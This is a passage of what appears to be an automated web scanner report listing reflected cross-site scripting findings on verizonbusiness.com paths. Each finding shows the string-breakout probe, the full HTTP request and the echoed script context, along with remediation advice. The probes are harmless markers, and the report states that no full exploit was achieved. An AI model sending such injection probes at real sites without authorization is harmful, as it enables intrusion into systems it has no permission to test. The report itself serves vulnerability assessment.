This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions42a1b'%3b157729166ce/byneed/sustainability/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions42a1b';157729166ce/byneed/sustainability/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.904. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/sustainability/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 647dc"%3b17769e56e6d was submitted in the REST URL parameter 1. This input was echoed as 647dc";17769e56e6d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions647dc"%3b17769e56e6d/byneed/sustainability/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions647dc";17769e56e6d/byneed/sustainability/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.905. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/sustainability/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec353"%3b0861a94b65e was submitted in the REST URL parameter 2. This input was echoed as ec353";0861a94b65e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneedec353"%3b0861a94b65e/sustainability/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:58 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41874
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneedec353";0861a94b65e/sustainability/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.906. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/sustainability/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9042'%3bd5b3e9cd73c was submitted in the REST URL parameter 2. This input was echoed as d9042';d5b3e9cd73c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneedd9042'%3bd5b3e9cd73c/sustainability/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:06 GMT
Content-Type: text/html
Content-Length: 41876
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneedd9042';d5b3e9cd73c/sustainability/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.907. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/sustainability/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df1cb"%3b0597c569708 was submitted in the REST URL parameter 3. This input was echoed as df1cb";0597c569708 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/sustainabilitydf1cb"%3b0597c569708/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:39:30 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41928
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneed/sustainabilitydf1cb";0597c569708/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.908. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/sustainability/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c77a5'%3b57909570fab was submitted in the REST URL parameter 3. This input was echoed as c77a5';57909570fab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/sustainabilityc77a5'%3b57909570fab/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41928
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneed/sustainabilityc77a5';57909570fab/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.909. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0e3e"%3bd581221d59a was submitted in the REST URL parameter 1. This input was echoed as d0e3e";d581221d59a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsd0e3e"%3bd581221d59a/bysolutions/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsd0e3e";d581221d59a/bysolutions/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.910. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b74c5'%3b9376f3b2b0c was submitted in the REST URL parameter 1. This input was echoed as b74c5';9376f3b2b0c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsb74c5'%3b9376f3b2b0c/bysolutions/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:12 GMT
Content-Type: text/html
Content-Length: 40644
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutionsb74c5';9376f3b2b0c/bysolutions/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.911. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d76c4'%3b41220c1f1ed was submitted in the REST URL parameter 2. This input was echoed as d76c4';41220c1f1ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsd76c4'%3b41220c1f1ed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:58 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41854
Date: Wed, 17 Nov 2010 00:34:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsd76c4';41220c1f1ed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.912. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d0d6"%3b9fd3e078299 was submitted in the REST URL parameter 2. This input was echoed as 4d0d6";9fd3e078299 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions4d0d6"%3b9fd3e078299/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:22 GMT
Content-Type: text/html
Content-Length: 41856
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions4d0d6";9fd3e078299/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.913. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/app-performance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a621e"%3be42f17bb74f was submitted in the REST URL parameter 1. This input was echoed as a621e";e42f17bb74f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsa621e"%3be42f17bb74f/bysolutions/app-performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:35:14 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsa621e";e42f17bb74f/bysolutions/app-performance/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.914. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/app-performance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31dba'%3b974b3467b09 was submitted in the REST URL parameter 1. This input was echoed as 31dba';974b3467b09 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions31dba'%3b974b3467b09/bysolutions/app-performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:43 GMT
Content-Type: text/html
Content-Length: 40676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions31dba';974b3467b09/bysolutions/app-performance/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.915. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/app-performance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3f40"%3bbb5a166c388 was submitted in the REST URL parameter 2. This input was echoed as f3f40";bb5a166c388 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsf3f40"%3bbb5a166c388/app-performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:01 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 41886
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutionsf3f40";bb5a166c388/app-performance/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

